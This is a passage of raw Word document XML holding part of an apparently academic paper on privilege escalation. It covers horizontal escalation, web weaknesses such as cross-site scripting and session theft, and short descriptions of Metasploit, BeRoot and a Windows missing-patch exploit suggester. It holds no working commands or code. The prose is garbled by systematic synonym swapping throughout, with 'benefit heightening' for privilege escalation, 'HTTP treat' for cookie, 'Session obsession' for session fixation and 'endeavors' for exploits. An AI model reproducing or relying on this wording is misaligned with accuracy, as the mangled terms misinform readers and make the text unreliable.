    <w:p w14:paraId="0EDBA6DC" w14:textId="7BBAC46A" w:rsidR="002B7628" w:rsidRDefault="002B7628" w:rsidP="002B7628">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•Patching </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7129A370" w14:textId="29A8B905" w:rsidR="002B7628" w:rsidRDefault="002B7628" w:rsidP="002B7628">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•Use of compilers that trap cushion </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>overruns[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">8] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13798DDC" w14:textId="2C67A86E" w:rsidR="002B7628" w:rsidRDefault="002B7628" w:rsidP="002B7628">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•Encryption of programming as well as firmware parts. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72984877" w14:textId="77777777" w:rsidR="002B7628" w:rsidRDefault="002B7628" w:rsidP="002B7628">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•Use of a working framework with Mandatory Access Controls (MAC, for example, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SELinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667F65B7" w14:textId="6F7B91E1" w:rsidR="003775F4" w:rsidRPr="003775F4" w:rsidRDefault="002B7628" w:rsidP="002B7628">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003775F4" w:rsidRPr="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Horizontal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A4C0ED" w14:textId="77777777" w:rsidR="002B7628" w:rsidRDefault="002B7628" w:rsidP="003775F4">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002B7628">
        <w:t xml:space="preserve">Level benefit heightening happens when an application enables the aggressor to access assets which regularly would have been shielded from an application or client. The outcome is that the application performs activities with the equivalent yet extraordinary security setting than proposed by the application designer or framework chairman; this is adequately a restricted type of benefit acceleration (explicitly, the unapproved suspicion of the ability of mimicking different clients). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203AC56A" w14:textId="77777777" w:rsidR="00014C47" w:rsidRDefault="003775F4" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003775F4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787DA45E" w14:textId="77777777" w:rsidR="00014C47" w:rsidRDefault="002B7628" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002B7628">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This issue frequently happens in web applications. Think about the accompanying precedent: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC0CF28" w14:textId="77777777" w:rsidR="00014C47" w:rsidRDefault="002B7628" w:rsidP="00056828">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="222"/>
        <w:ind w:right="11"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B7628">
        <w:t xml:space="preserve">User An approaches their own financial balance in an Internet Banking application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5FE415" w14:textId="77777777" w:rsidR="00014C47" w:rsidRDefault="002B7628" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="222"/>
        <w:ind w:right="11"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:t xml:space="preserve">User B approaches their own financial balance in a similar Internet Banking application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509228A6" w14:textId="7CD7BD73" w:rsidR="00014C47" w:rsidRDefault="002B7628" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="222"/>
        <w:ind w:right="11"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:t xml:space="preserve">The weakness happens when User A can get to User B's ledger by playing out a type of noxious movement. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682BAC70" w14:textId="77777777" w:rsidR="00014C47" w:rsidRDefault="002B7628" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:right="11"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:t>This malevolent movement might be conceivable because of regular web application shortcomings or vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6BE448" w14:textId="77777777" w:rsidR="00014C47" w:rsidRDefault="002B7628" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:right="11"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B7628">
        <w:t>Potential web application vulnerabilities or circumstances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B7628">
        <w:t xml:space="preserve">that may prompt this condition include: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E58C6DB" w14:textId="74D0B664" w:rsidR="002B7628" w:rsidRDefault="002B7628" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="222"/>
        <w:ind w:right="11"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B7628">
        <w:t xml:space="preserve">Predictable session ID's in the client's HTTP treat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A5C878" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="002B7628" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:right="11"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7628">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Session obsession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570884D9" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="002B7628" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:right="11"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7628">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-site scripting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD7030" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="002B7628" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:right="11"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7628">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Easily guessable passwords </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5625EF33" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="002B7628" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:right="11"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7628">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Theft or capturing of session treats </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08566AD9" w14:textId="314D7DD8" w:rsidR="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:right="11"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7628">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Keystroke logging </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E18909" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47"/>
    <w:p w14:paraId="25063753" w14:textId="77777777" w:rsidR="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="0" w:right="11" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>II.R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">EVIEW OF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>ITERATURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8520B9" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="EAECEF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Different techniques for Escalating benefits on a Windows machine and remotely adding clients and manager to abuse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6045548A" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="EAECEF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC90B5F" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="EAECEF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The Metasploit Framework is an open source stage that gives a library of continually refreshed endeavors and a domain for creating apparatuses and mechanizing the procedure of entrance testing [8</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>].It</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a worked in sniffer, DNS server and passage [9] that can be utilized in the reproduction of assaults. There is likewise a shell called 'Meterpreter' that can be utilized by pen analyzers to catch delicate information like client accreditations [8]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09197942" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="EAECEF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This is done so as to identify client accreditations that perhaps powerless or reused. When utilizing this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>structure</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the endeavor is chosen first, at that point arranged with the remote IP address and port number. This is trailed by picking the payload which is likewise arranged with the nearby IP address and port number. The last advance is execution of the endeavor [9]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F21F42" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="002B7628" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="222"/>
        <w:ind w:right="11" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC1A3E5" w14:textId="47A15950" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="EAECEF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>BeRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Project </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A52D94" w14:textId="6C59AF27" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="EAECEF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>BeRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Project is a post abuse instrument to check normal misconfigurations to figure out how to raise our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>privilege.It</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> has been added to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pupy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> venture as a post misuse module (so it will be executed in memory without contacting the plate). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403FD84C" w14:textId="77777777" w:rsidR="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="EAECEF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This instrument does not understand any abuse. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mains objective isn't to understand a setup evaluation of the host (posting all administrations, all procedures, all system association, and so forth.) yet to print just data that have been found as potential approach to raise our benefit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCD4D4F" w14:textId="22660E50" w:rsidR="00985DDC" w:rsidRPr="00985DDC" w:rsidRDefault="00985DDC" w:rsidP="00014C47">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="EAECEF"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DDC">
        <w:rPr>
          <w:i/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEAB88C" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">This apparatus thinks about an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>objectives</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> fix levels against the Microsoft helplessness database so as to distinguish potential missing patches on the objective. It additionally tells the client if there are open adventures and Metasploit modules accessible for the missing notices. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB6A98D" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13936622" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>It requires the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">' direction yield from a Windows have so as to look at that the Microsoft security release database and decide the fix dimension of the host. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C1ED03" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62AE4A94" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">It can naturally download the security notice database from Microsoft with the - update banner, and spares it as an Excel spreadsheet. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536FFC56" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3050A7" w14:textId="38AF6AF8" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">When taking a gander at the order yield, note that it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>expect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> all vulnerabilities and after that specifically expels them dependent on the hotfix information. This can result in some false-positives, and it is vital to comprehend what programming is really running on the objective host. For instance, if there are realized IIS abuses it will hail them regardless of whether IIS isn't running on the objective host. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A92CF3C" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D253651" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">The yield demonstrates either open adventures (E), or Metasploit modules (M) as shown by the character esteem. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A1B5A4" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1286C5C0" w14:textId="2FE922A6" w:rsidR="00985DDC" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
